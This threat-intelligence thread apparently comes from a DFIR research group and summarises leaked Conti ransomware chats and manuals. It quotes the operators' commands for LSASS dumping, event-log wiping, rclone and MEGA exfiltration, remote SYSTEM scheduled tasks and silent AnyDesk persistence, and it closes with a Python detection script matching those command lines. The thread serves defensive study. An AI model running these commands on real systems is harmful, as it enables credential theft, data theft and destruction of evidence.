The DFIR Report
Mar 1, 2022 · 78 tweets
Here's a thread on some of the interesting things we've seen in the #ContiLeaks.

If you would like to read the chat logs and TrickBot Forum information, @Kostastsale has translated them to English here: github.com/tsale/translat…. He will be adding more as things get leaked.
New chat logs from the 26 Feb to the 28 Feb were released. It included an entertaining exchange where the user "pumba" was not happy with their work partner "tramp" (also referred to as “trump”). “Pumba” ends the conversation by asking to be moved to another team. #ContiLeaks
Leaked Bazar Bot panels show hundreds of past infected clients. Entries contain comments that include reconnaissance of the victim's revenue and tracking of work to be done. #ContiLeaks
Additional infrastructure has been identified, including the source code and configurations of many of their sites. iptables rules and nginx configuration leak more IP addresses! Files contain Postgres passwords for their storage. #ContiLeaks
Can relate - #ImposeCost or infra problems? #ContiLeaks
Possible Conti v2 locker/decryptor. Folder is password protected. #ContiLeaks
Even threat actors use code control! GitLab Server IP and token. #ContiLeaks
Threat actors potentially talking about a developer who worked on Trickbot and Bazar. #ContiLeaks
Potentially more proof on Trickbot dying off. #ContiLeaks
Threat actors talking about Zerologon on the Trickbot forum. Look familiar? thedfirreport.com/2022/02/21/qbo… thedfirreport.com/2021/11/01/fro… #ContiLeaks
Threat actors talking about Kerberoasting on the Trickbot forum #ContiLeaks
Decrypting Veeam secrets - we saw this in our Diavol case - thedfirreport.com/2021/12/13/dia… #ContiLeaks
Discussing SonicWall SSL-VPN as initial access #ContiLeaks
"Fast Guide" - net, dclist, nltest, adfind, kerberoast, seatbelt, net-gpppassword, sharefinder, etc. #ContiLeaks Image
"I recommend using all the utilities attached in the c# topic by collecting them from the sources on the github.
" #ContiLeaks Image
"SMB Auto Brute Force" - Invoke-SMBAutoBrute.ps1

"We've ripped off two domain admins." #ContiLeaks ImageImageImage
"Tor backdoor" #ContiLeaks ImageImageImageImage
FileZilla discussion

"On networks where there are no DLP systems, you can simply download Filezilla portable and download all cartoons without ads!11
But you only need to use the SFTP protocol, that is, through port 22, not through 21" #ContiLeaks
Disabling Defender using GPO

"If you have only a defender in your network, then it is extinguished using the link above. It's right there in the pictures. Easier nowhere. Went to DC, created a policy
" #ContiLeaks Image
"Hyper V"

"it’s easier than with the sphere and proxmox, we fly into the virtuoso management manager, look in it where are the cars (Shares, AD) and compare with the list that was removed, if the entire infrastructure is on virtual machines, then just turn off..." #ContiLeaks Image
Disabling notifications on Synology servers before ransom #ContiLeaks
"Change RDP port" #ContiLeaks Image
"NTDS Dumping"

We reported on this technique multiple times - thedfirreport.com/?s=ac+i+ntds #ContiLeaks
Another method to steal a copy of ntds.dit using shadow copy, wmic, 7zip, and esentutl. #ContiLeaks
Don't know what to do on your next op? Just ask your team leader! #ContiLeaks
"Hunt Administrator"

"Of course, we are interested in seniors because they have more privileges/accesses (read passwords)."

net group "domain admins" /domain
AdFind

#ContiLeaks
"Hunt Administrator Part 2"

"Firstly, how the software works - it asks where the user is at least somehow authorized at the moment. And our user is not simple - he is an administrator and at some point he can be authorized on 20-30-50 servers."

#ContiLeaks
"Hunt Administrator Part 2"

"Also, system administrators FREQUENTLY meet the following folders in AppData\Roaming && AppData\Local:
Keepass
LastPass
their configs are there."

#ContiLeaks
"Hunt Administrator Part 2"

"Why the manual was written - so as not to try headlong to go raise the session and catch alerts from the admin.
Our job is rather to figure out what works, rather than setting up brute force for all kinds of access."

#ContiLeaks
"powerupsql"

powershell-import /home/user/soft/scripts/powerupsql.ps1
runas /netonly /user:domain.local\user powershell_ise

"From vpn it also works through (grabbing skl servers in the domain)"

#ContiLeaks
Threat actors having some issues with Cylance Protect

Difficulty raising session
Mount AnyDesk / Onion backdoor
Anchor DLL not attaching
Dump LSASS does not help (the output is empty)
Palit advanced ip scanner
Deleted via GUI + reboot

#ContiLeaks
"TeamServer setup" #CobaltStrike

C2concealer being used by Conti TAs - Mentioned in a couple of our #CobaltStrike reports thedfirreport.com/2022/01/24/cob… thedfirreport.com/2021/08/29/cob…

#ContiLeaks
"ShadowProtect SPX (StorageCraft)"

"Accessing a server with Shadow Protect SPX backups (StorageCraft)"

#ContiLeaks
"Useful Links and Websites"

#ContiLeaks
Kerberoasting using compromised VPN creds

#ContiLeaks
"Backup of all MS Exchange mailboxes in one command"

foreach ($mbx in (Get-Mailbox)){New-MailboxExportRequest -mailbox $mbx.alias -FilePath "\\Server\SharedFolder\$($mbx.Alias).pst"}

#ContiLeaks
"Rclone"

shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

"Everyone connects via SSH under their own account, configures the remote (if it is not already configured), creates.."

#ContiLeaks
"Finding and uploading a webshell in Exchange Microsoft"

#ContiLeaks
"Finding and uploading a webshell in Exchange Microsoft"

"The lightest and most durable webshell I use is this"

"For those who have asp webshell removed \ scorched by Aver! you can obfuscate not only the one in the archive, it removes detections.."

#ContiLeaks
"Anydesk"

cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent

"And then we log in with a local admin or a domain account and use the charms of Anydesk
You can also download / upload to / from the victim's machine..."

#ContiLeaks
The #ContiLeaks account recently linked additional source code relating to Trickbot. It includes Erlang code and configuration files from supporting Trickbot infrastructure.
"Install metasploit on vps"

#ContiLeaks
"HOW AND WHAT INFO TO DOWNLOAD"

"Next, we study the removed balls, we are interested in
*Finance docks
*Accounting
*Aichi
*Clients
*Projects
And so on, it all depends on what our target is doing"

#ContiLeaks
"RIGHT CLICK ON THE AGENT AND CLICK INTERACT"

Clicky clicky instructions for #CobaltStrike/Discovery

#ContiLeaks
Team descriptions, team leads, scheduling, etc.

#ContiLeaks
"MegaNZ usage"

MEGAclient.exe login supertest@mail.test P@$$w0rd
schtasks /query /FO list | findstr /i "mega"

#ContiLeaks
"IF RDP IN LOCAL IS VERY NEEDED :: HOW NOT TO SLEEP"

"Such simple tricks will help you not to sleep stupidly on the RDP"

"We do not sit on the RDP, after we have finished - we do Logoff (MANDATORY). Not to be confused with simply closing the RDP window. =)"

#ContiLeaks
"Starting a binary on a remote machine via SCHTASKS from Cobalt Strike"

shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvvhost.exe" /sc ONCE /sd 01/01/2021 /st 00:00

#ContiLeaks
We always thought Conti was the rebrand for Ryuk, and info keeps rolling in:

#ContiLeaks
So...we are pretty good at what we do?

screenshot credits to:

#ContiLeaks
"megacmd"

shell MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /

#ContiLeaks
Executing the locker, with examples and parameters

"All parameters can be combined with each other, the order is not important. If the locker is launched through the command line, then run it as an administrator (If you have rights)."

#ContiLeaks
"Get-ADComputer"

(Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})

thedfirreport.com/?s=Get-ADCompu…

5x Bazar cases
1x Ryuk
1x Trickbot

#ContiLeaks
More Rclone chatter; it appears they learned about the tool around 2021-04-07.

"rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12"

"here is the guide. everything is simple here"

thedfirreport.com/?s=rclone

#ContiLeaks
#CobaltStrike

"The current version of cobalt is patched with a Java hook where a trial EICAR fingerprint was taken."

"there is an artifact.cna that needs to be imported into cobalt to generate internal native loads and staged loads to run."

#ContiLeaks
"Regulations for submitting a case and working with data"

"In the process of data retrieval and in the process of parsing, we are looking for files containing cyber insurance conditions, standard search tags

Cyber
policy
insurance
endorsement
supplementary..."

#ContiLeaks
TAs exploiting SonicWall SMA

#ContiLeaks
"Dumping Lsass without katz"

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP

cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

#ContiLeaks
Lots of familiar tools in these dumps/conversations.

TA using Responder

#ContiLeaks
SharpHound/Bloodhound

"shoot the sharphound, throw the shot into the bloodhound - profit"

execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --exc...

#ContiLeaks
"Cleaning out the dens" aka deleting logs

1. CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

2. PowerShell
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

#ContiLeaks
TAs testing WinPwn by @ShitSecure and @GossiTheDog's HiveNightmare

#ContiLeaks
@ShitSecure @GossiTheDog TAs talking about installing Windows Subsystem for Linux

"we need windows server 2019+"

#ContiLeaks
@ShitSecure @GossiTheDog Few references to SharpChromium so far

"SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

Cookies
History
Saved Logins"

github.com/djhohnstein/Sh…

#ContiLeaks
Impacket, proxychains, psexec

#ContiLeaks
TAs testing/talking about PetitPotam by @topotam77

"I did this manu, suddenly it will help someone. bussink.net/ad-cs-exploit-…"

"Has anyone smoked this github.com/topotam/PetitP…"

#ContiLeaks
@topotam77 Few conversations about using this #Zerologon exploit github.com/nccgroup/nccfs… by @NCCGroupInfosec:

"it's better to check with SharpZerologon, it's more reliable"

#ContiLeaks
It seems the TAs had a common set of exploits they usually tried, including:

EternalBlue (MS17-010)
BlueKeep (CVE-2019-0708)
SMBGhost (CVE-2020-0796)

#ContiLeaks
winPEAS by @carlospolopm getting a few call outs.

Also mentions of Seatbelt, Inveigh by @kevin_robertson and Rubeus.

"Run ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit."

#ContiLeaks
Step by step instructions by "tl1"

1. Collect domain and the environment info
2. Collect AD info
3. seatbelt, WinPEAS, GPP, ShareFinder, Kerberoast, asreproast, zerologon
4. Persistence during ShareFinder exec
5. Lateral movement if possible

#ContiLeaks
sqlcmd

"see who is working with the database (hosts and users from where they connected to it)"

shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"

shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

#ContiLeaks
A couple mentions of SessionGopher by @arvanaghi

"it turned out that no one listens to me so I say it again to all who have eyes and ears use session gopher domain-width before locking"

h/t to @seadev3 for pointing that out
"NGROK v2 (only official solution)"

Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"

.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config "C:\Windows\tmp\config.yml" --log "false"

#ContiLeaks
"Stops everything that is possible. VERY useful when locking when you need to lock servers nearby that are busy with DBs and other applications."

If you're detecting the below commands, it's too late. Try to detect earlier in the attack lifecycle.

#ContiLeaks
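Several of the command lines quoted in this thread (event log clearing, LSASS dumping, rclone and MEGA uploads, remote SCHTASKS as SYSTEM, ngrok wrapped in nssm) are cheap to match on process-creation telemetry, and each one is a late-stage signal a defender wants alongside the earlier discovery activity. The following Python is an added example, not code from the thread or the leaks; the pipe-delimited log format, host names and user names are constructed for it.

```python
"""Added example (not code from the thread or the leaks): a detection pass over
constructed process-creation records for command lines quoted in this thread:
event-log clearing, LSASS dumps, rclone/MEGAclient exfil, remote SCHTASKS as
SYSTEM and ngrok started through nssm. Log format and records are constructed."""
import re
from typing import Dict, List

# Rule name -> pattern over the raw command line (all case-insensitive).
RULES: Dict[str, re.Pattern] = {
    # wevtutil cl / Clear-EventLog; corroborate with Security 1102 and System 104 events
    "event_log_clearing": re.compile(r"wevtutil(\.exe)?\s+cl\b|Clear-EventLog\b", re.I),
    # ProcDump full memory dump (-ma) of lsass.exe
    "lsass_dump_procdump": re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\s+lsass(\.exe)?\b", re.I),
    # rundll32 comsvcs.dll, MiniDump <pid> <path> full
    "lsass_dump_comsvcs": re.compile(r"comsvcs\.dll\s*,\s*MiniDump\b", re.I),
    # rclone copy/sync/move to a configured remote ("name:" that is not a drive letter path)
    "rclone_exfil": re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b.*\s[A-Za-z0-9_-]+:(?![\\/])", re.I),
    # MEGAcmd client login or upload
    "mega_exfil": re.compile(r"megaclient(\.exe)?\s+(put|login)\b", re.I),
    # schtasks /create against a remote host (/s) running as SYSTEM (/RU), flags in any order
    "remote_schtasks_as_system": re.compile(r'schtasks(\.exe)?(?=.*\s/s\s+\S+)(?=.*\s/create\b)(?=.*\s/ru\s+"?system\b)', re.I),
    # nssm service wrapping ngrok's "start --all --region" regardless of what the binary was renamed to
    "ngrok_via_nssm": re.compile(r"nssm(\.exe)?\s+install\b.*\sstart\s+--all\b.*--region\s+\w+", re.I),
}

def match_rules(cmdline: str) -> List[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, pat in RULES.items() if pat.search(cmdline)]

def scan(records: List[str]) -> List[dict]:
    """Parse 'time|host|user|command_line' records; return one hit per flagged record."""
    hits = []
    for rec in records:
        ts, host, user, cmd = rec.split("|", 3)  # the command line may itself contain '|'
        names = match_rules(cmd)
        if names:
            hits.append({"time": ts, "host": host, "user": user, "rules": names, "cmd": cmd})
    return hits

# Constructed records: flagged command lines are the ones quoted in the thread, the first is a benign look-alike.
SAMPLE_RECORDS = [
    "2022-02-26T10:01:02|FS01|CORP\\svc_backup|wevtutil.exe qe Security /c:5",
    "2022-02-26T10:02:11|FS01|CORP\\admin1|for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"",
    "2022-02-26T10:03:40|DC01|CORP\\admin1|powershell.exe Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }",
    "2022-02-26T10:05:09|DC01|CORP\\admin1|procdump.exe -accepteula -r -ma lsass.exe lsass.dmp",
    "2022-02-26T10:05:30|DC01|CORP\\admin1|rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 624 C:\\temp\\lsass.dmp full",
    "2022-02-26T10:20:00|FS01|CORP\\admin1|rclone.exe copy \"\\\\FS\\\" remote:NT -q --ignore-existing --auto-confirm --transfers 12",
    "2022-02-26T10:25:00|FS01|CORP\\admin1|MEGAclient.exe put -q --ignore-quota-warn C:\\temp\\Data1.7z /",
    "2022-02-26T10:30:00|FS01|CORP\\admin1|SCHTASKS /s remote-hostname123 /RU \"SYSTEM\" /create /tn \"WindowsSensor15\" /tr \"cmd.exe /c C:\\ProgramData\\srvvhost.exe\" /sc ONCE /sd 01/01/2021 /st 00:00",
    "2022-02-26T10:40:00|FS01|CORP\\admin1|nssm.exe install sysmon C:\\Windows\\tmp\\sysmon.exe start --all --region us --config \"C:\\Windows\\tmp\\config.yml\"",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit["time"], hit["host"], hit["user"], ",".join(hit["rules"]))
```

The rules key on arguments rather than binary names because, as the ngrok-as-sysmon.exe and srvvhost.exe examples above show, the file names were routinely changed.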
All for now!

Shout out to @svch0st for helping!
Shout out to @Kostastsale for translating the leaks!
Shout out to @ContiLeaks for providing the leaks!

#ContiLeaks
